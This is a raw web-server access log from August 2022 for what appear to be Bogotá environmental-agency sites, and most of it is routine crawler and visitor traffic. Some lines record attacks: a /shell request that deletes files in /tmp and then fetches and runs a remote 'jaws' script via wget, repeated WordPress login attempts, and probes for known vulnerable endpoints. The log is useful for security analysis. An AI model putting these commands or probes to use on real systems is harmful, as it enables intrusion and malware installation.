172.22.2.4 - - [25/Aug/2022:03:59:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:03:59:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [25/Aug/2022:04:01:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:04:04:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:04:05:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [25/Aug/2022:04:05:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [25/Aug/2022:04:04:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Aug/2022:04:06:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:05:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56367
66.249.73.191 - - [25/Aug/2022:04:07:56 -0500] "-" 408 -
201.245.192.253 - - [25/Aug/2022:04:09:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
207.46.13.45 - - [25/Aug/2022:04:10:19 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+1997%2F HTTP/1.1" 200 2025
216.245.221.92 - - [25/Aug/2022:04:11:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:10:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.127.25 - - [25/Aug/2022:04:12:47 -0500] "GET /secretaria-de-ambiente-incrementa-evaluacion-y-seguimiento-al-arbolado-urbano.html HTTP/1.1" 206 933
172.22.2.4 - - [25/Aug/2022:04:11:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59819
157.55.39.80 - - [25/Aug/2022:04:14:08 -0500] "GET /bla/resoluciones/notificaciones/autos%202018/03515.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Aug/2022:04:14:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:04:14:42 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
216.245.221.92 - - [25/Aug/2022:04:16:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:16:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:17:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48343
201.245.192.253 - - [25/Aug/2022:04:19:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:04:19:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43783
201.245.192.253 - - [25/Aug/2022:04:19:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40480
172.22.2.4 - - [25/Aug/2022:04:18:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51984
157.55.39.51 - - [25/Aug/2022:04:21:44 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/Ficha-comadreja-fauna-27-mayo-300x169.jpg HTTP/1.1" 200 15290
216.245.221.92 - - [25/Aug/2022:04:21:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:22:02 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [25/Aug/2022:04:22:07 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
185.119.81.109 - - [25/Aug/2022:04:22:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [25/Aug/2022:04:22:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [25/Aug/2022:04:22:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:04:24:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:04:23:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
185.119.81.105 - - [25/Aug/2022:04:26:47 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [25/Aug/2022:04:26:47 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
216.245.221.92 - - [25/Aug/2022:04:26:59 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.36 - - [25/Aug/2022:04:28:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/870.tif HTTP/1.1" 200 78128
201.245.192.253 - - [25/Aug/2022:04:29:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:04:29:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43783
201.245.192.253 - - [25/Aug/2022:04:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40480
172.22.2.4 - - [25/Aug/2022:04:28:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:29:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
185.119.81.103 - - [25/Aug/2022:04:31:34 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [25/Aug/2022:04:31:35 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
216.245.221.92 - - [25/Aug/2022:04:31:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:04:34:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:04:34:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.45 - - [25/Aug/2022:04:35:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201250-1299.tif HTTP/1.1" 200 4609589
41.42.114.213 - - [25/Aug/2022:04:36:20 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synns.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [25/Aug/2022:04:34:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
216.245.221.92 - - [25/Aug/2022:04:36:59 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.51 - - [25/Aug/2022:04:38:47 -0500] "GET /rknowsys-theme/js/jquery.min.js HTTP/1.1" 404 1034
201.245.192.253 - - [25/Aug/2022:04:39:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:04:39:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43783
201.245.192.253 - - [25/Aug/2022:04:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40480
172.22.2.4 - - [25/Aug/2022:04:40:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [25/Aug/2022:04:39:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Aug/2022:04:41:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:40:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
201.245.192.253 - - [25/Aug/2022:04:44:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [25/Aug/2022:04:46:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:45:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.83.64.77 - - [25/Aug/2022:04:47:49 -0500] "GET / HTTP/1.1" 200 319
45.83.65.51 - - [25/Aug/2022:04:47:49 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [25/Aug/2022:04:46:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [25/Aug/2022:04:49:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:04:51:20 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
216.245.221.92 - - [25/Aug/2022:04:51:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:51:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:52:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
201.245.192.253 - - [25/Aug/2022:04:54:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [25/Aug/2022:04:56:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:04:56:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58946
172.22.2.4 - - [25/Aug/2022:04:57:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:04:59:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:04:58:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54814
207.46.13.11 - - [25/Aug/2022:05:00:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201800-1849.tif HTTP/1.1" 200 4946376
216.245.221.92 - - [25/Aug/2022:05:01:59 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.45 - - [25/Aug/2022:05:03:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/854.tif HTTP/1.1" 200 286004
201.245.192.253 - - [25/Aug/2022:05:04:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:05:03:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.103 - - [25/Aug/2022:05:05:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [25/Aug/2022:05:05:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [25/Aug/2022:05:04:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [25/Aug/2022:05:06:59 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.115 - - [25/Aug/2022:05:08:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20700-749.tif HTTP/1.1" 200 4710687
201.245.192.253 - - [25/Aug/2022:05:09:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:05:09:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:09:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
216.245.221.92 - - [25/Aug/2022:05:11:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:12:41 -0500] "GET /BLA/boletinlegal/_ignition/execute-solution HTTP/1.1" 404 1018
201.245.192.253 - - [25/Aug/2022:05:14:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:05:14:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Aug/2022:05:16:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:15:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [25/Aug/2022:05:19:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:05:19:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43620
201.245.192.253 - - [25/Aug/2022:05:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40479
34.147.34.127 - - [25/Aug/2022:05:19:46 -0500] "GET / HTTP/1.1" 200 319
34.147.34.127 - - [25/Aug/2022:05:19:47 -0500] "GET / HTTP/1.1" 200 4720
185.119.81.101 - - [25/Aug/2022:05:20:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [25/Aug/2022:05:20:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
66.249.73.164 - - [25/Aug/2022:05:21:37 -0500] "-" 408 -
216.245.221.92 - - [25/Aug/2022:05:21:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:20:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:21:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53281
172.22.2.4 - - [25/Aug/2022:05:22:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
201.245.192.253 - - [25/Aug/2022:05:24:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [25/Aug/2022:05:26:59 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.115 - - [25/Aug/2022:05:27:59 -0500] "GET /BLA/resoluciones/860.tif HTTP/1.1" 404 1018
172.22.2.4 - - [25/Aug/2022:05:26:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:27:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
201.245.192.253 - - [25/Aug/2022:05:29:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:05:29:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43620
201.245.192.253 - - [25/Aug/2022:05:29:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40479
191.156.150.66 - - [25/Aug/2022:05:30:42 -0500] "GET /forest/ HTTP/1.1" 200 12041
191.156.150.66 - - [25/Aug/2022:05:30:58 -0500] "GET /forest/ HTTP/1.1" 200 12041
191.156.150.66 - - [25/Aug/2022:05:31:05 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
216.245.221.92 - - [25/Aug/2022:05:31:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:32:06 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [25/Aug/2022:05:32:08 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 48343
172.22.2.4 - - [25/Aug/2022:05:32:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:05:34:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:05:32:30 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 44462
172.22.2.4 - - [25/Aug/2022:05:33:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52484
157.55.39.108 - - [25/Aug/2022:05:36:30 -0500] "GET /portaldeninos/2021/06/06/ciudadanos-disfrutaron-del-tunel-ambiental-en-el-parque-de-los-novios/ HTTP/1.1" 200 105118
216.245.221.92 - - [25/Aug/2022:05:36:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:05:38:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
201.245.192.253 - - [25/Aug/2022:05:39:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43620
201.245.192.253 - - [25/Aug/2022:05:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40479
172.22.2.4 - - [25/Aug/2022:05:38:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:39:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49680
172.22.2.4 - - [25/Aug/2022:05:40:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
216.245.221.92 - - [25/Aug/2022:05:41:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:43:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [25/Aug/2022:05:43:24 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [25/Aug/2022:05:42:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [25/Aug/2022:05:43:52 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [25/Aug/2022:05:43:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [25/Aug/2022:05:43:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:05:44:04 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
157.55.39.80 - - [25/Aug/2022:05:44:25 -0500] "GET /BLA/resoluciones/856.tif HTTP/1.1" 404 1018
207.46.13.45 - - [25/Aug/2022:05:44:28 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
157.55.39.80 - - [25/Aug/2022:05:44:35 -0500] "GET /Autoliquidacion/ HTTP/1.1" 200 6629
172.22.2.4 - - [25/Aug/2022:05:44:42 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2003%20del%2024%20de%20Febrero%20de%202017.pdf HTTP/1.1" 304 -
172.22.2.4 - - [25/Aug/2022:05:44:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.154.39.162 - - [25/Aug/2022:05:46:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.154.39.162 - - [25/Aug/2022:05:46:18 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.154.39.162 - - [25/Aug/2022:05:46:18 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [25/Aug/2022:05:44:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [25/Aug/2022:05:46:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:05:48:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:05:49:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [25/Aug/2022:05:51:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:50:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
201.245.192.253 - - [25/Aug/2022:05:53:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
157.55.39.80 - - [25/Aug/2022:05:55:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201950-1999.tif HTTP/1.1" 200 4490670
207.46.13.36 - - [25/Aug/2022:05:56:02 -0500] "GET /galeria/galeria/fotos/diaSC10.jpg HTTP/1.1" 200 150830
216.245.221.92 - - [25/Aug/2022:05:56:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:05:55:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.11 - - [25/Aug/2022:05:58:00 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2001%20del%2012%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [25/Aug/2022:05:56:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
185.119.81.109 - - [25/Aug/2022:05:58:31 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [25/Aug/2022:05:58:32 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [25/Aug/2022:05:58:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [25/Aug/2022:06:01:59 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Aug/2022:06:01:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:06:03:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:02:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
172.22.2.4 - - [25/Aug/2022:06:05:55 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%20011%20del%2005%20de%20julio%20de%202017.pdf HTTP/1.1" 304 -
216.245.221.92 - - [25/Aug/2022:06:06:59 -0500] "HEAD / HTTP/1.1" 200 -
20.150.205.138 - - [25/Aug/2022:06:08:27 -0500] "GET /pv/aastra.cfg HTTP/1.1" 404 1018
201.245.192.253 - - [25/Aug/2022:06:08:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:07:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.105 - - [25/Aug/2022:06:09:47 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [25/Aug/2022:06:09:48 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [25/Aug/2022:06:08:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
216.245.221.92 - - [25/Aug/2022:06:11:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Aug/2022:06:13:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:12:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
172.22.2.4 - - [25/Aug/2022:06:13:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.170.213.17 - - [25/Aug/2022:06:15:02 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.170.213.17 - - [25/Aug/2022:06:15:03 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
186.170.213.17 - - [25/Aug/2022:06:15:03 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
186.170.213.17 - - [25/Aug/2022:06:15:03 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
186.170.213.17 - - [25/Aug/2022:06:15:03 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
186.170.213.17 - - [25/Aug/2022:06:15:11 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.170.213.17 - - [25/Aug/2022:06:15:14 -0500] "POST /appsia/controlador HTTP/1.1" 200 7793
186.170.213.17 - - [25/Aug/2022:06:15:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 6658
186.170.213.17 - - [25/Aug/2022:06:15:28 -0500] "POST /appsia/controlador HTTP/1.1" 200 12843
172.22.2.4 - - [25/Aug/2022:06:13:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 41326
172.22.2.4 - - [25/Aug/2022:06:14:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44887
207.46.13.45 - - [25/Aug/2022:06:16:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20350-399.tif HTTP/1.1" 200 4678251
216.245.221.92 - - [25/Aug/2022:06:16:58 -0500] "HEAD / HTTP/1.1" 200 -
186.170.213.17 - - [25/Aug/2022:06:17:00 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.170.213.17 - - [25/Aug/2022:06:17:08 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [25/Aug/2022:06:18:00 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 304 -
207.46.13.11 - - [25/Aug/2022:06:18:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1655.pdf HTTP/1.1" 304 -
40.77.167.101 - - [25/Aug/2022:06:18:34 -0500] "-" 408 -
201.245.192.253 - - [25/Aug/2022:06:18:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [25/Aug/2022:06:19:25 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [25/Aug/2022:06:19:26 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [25/Aug/2022:06:19:27 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1334
201.245.192.253 - - [25/Aug/2022:06:19:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43627
201.245.192.253 - - [25/Aug/2022:06:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40343
172.22.2.4 - - [25/Aug/2022:06:19:43 -0500] "GET /BLA/boletinlegal/consulta_conceptos.php?no=&solicitante=&radicado_entrada=&fecha_concepto=2022&objeto= HTTP/1.1" 200 17311
185.119.81.105 - - [25/Aug/2022:06:19:53 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
172.22.2.4 - - [25/Aug/2022:06:19:53 -0500] "GET /BLA/boletinlegal/conceptos/2022/34.pdf HTTP/1.1" 404 1334
185.119.81.105 - - [25/Aug/2022:06:19:54 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
185.119.81.103 - - [25/Aug/2022:06:20:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [25/Aug/2022:06:20:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [25/Aug/2022:06:20:11 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
